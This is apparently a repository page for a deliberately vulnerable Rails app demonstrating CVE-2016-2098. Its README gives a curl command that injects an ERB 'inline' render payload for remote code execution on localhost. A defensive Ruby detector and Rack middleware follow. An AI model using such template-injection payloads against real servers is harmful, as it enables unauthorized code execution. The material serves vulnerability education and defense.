Proof of concept showing how CVE-2016-2098 leads to remote code execution
app
bin
config
db
lib
log
public
test
vendor/assets
.gitignore
Gemfile
Gemfile.lock
README.rdoc
Rakefile
config.ru

README

Proof of concept for groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q

Exploiting:

  1. Only run the Rails server in a way you are certain does not expose it to anyone else, since this application is deliberately vulnerable

  2. Run `rails s`

  3. Execute the following command

`curl -v -H "Accept: application/json" -H "Content-type: application/json" -X GET -d ' {"id" : { "inline" : "<%= FileUtils.touch "rooted"%>"}}' localhost:3000/exploits`

  4. Verify that the file "rooted" now exists in the project directory
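The request above works because a JSON parameter carrying an `inline` render option reaches `render` and is evaluated as ERB. The proper fix is the patched Action Pack release from the advisory linked above, together with never handing user-controlled hashes to `render`; the following is an added defensive example (not code from this repository) that shows how to spot such request bodies in a JSON-speaking Rails app. It assumes a Rack middleware seat in front of the application, and the sample bodies are constructed for the demonstration.

```ruby
require 'json'
require 'stringio'

# Constructed sample request bodies for the demonstration (not taken from the repo).
SAMPLE_BODIES = {
  benign:  '{"id": 42, "name": "widget"}',
  nested:  '{"id": {"inline": "<%= 1 + 1 %>"}}',
  garbage: '{"id": '
}.freeze

# An ERB opening tag inside a string value is the tell for template injection.
ERB_TAG = /<%/.freeze

# Recursively walk a parsed JSON structure and collect every hash key named
# "inline" (the render option the advisory warns about), recording whether
# its value contains an ERB tag.
def find_inline_keys(node, path = [])
  hits = []
  case node
  when Hash
    node.each do |k, v|
      if k.to_s == 'inline'
        hits << { path: (path + [k]).join('.'),
                  erb: v.is_a?(String) && v.match?(ERB_TAG) }
      end
      hits.concat(find_inline_keys(v, path + [k]))
    end
  when Array
    node.each_with_index { |v, i| hits.concat(find_inline_keys(v, path + [i])) }
  end
  hits
end

# Classify a raw JSON body as :malformed (unparseable), :clean (no "inline"
# key anywhere), :suspicious ("inline" key present) or :erb ("inline" key
# whose value carries an ERB tag).
def classify_body(raw)
  parsed = JSON.parse(raw)
  hits = find_inline_keys(parsed)
  return :clean if hits.empty?

  hits.any? { |h| h[:erb] } ? :erb : :suspicious
rescue JSON::ParserError
  :malformed
end

# Hypothetical Rack middleware: reject JSON requests whose body classifies
# as :erb before they reach the application, and pass everything else on.
# This is a compensating control, not a substitute for upgrading Rails.
class InlineRenderGuard
  def initialize(app)
    @app = app
  end

  def call(env)
    input = env['rack.input']
    body = input.read
    input.rewind # leave the body readable for the application
    json = env['CONTENT_TYPE'].to_s.start_with?('application/json')
    if json && classify_body(body) == :erb
      return [400, { 'Content-Type' => 'text/plain' }, ['rejected: inline template in request body']]
    end

    @app.call(env)
  end
end

if __FILE__ == $PROGRAM_NAME
  SAMPLE_BODIES.each { |name, raw| puts "#{name}: #{classify_body(raw)}" }
end
```

In a real deployment the middleware would be added with `config.middleware.use InlineRenderGuard` and the rejected requests logged for follow-up; `classify_body` alone is enough to run over captured request bodies when hunting for attempts in historical logs.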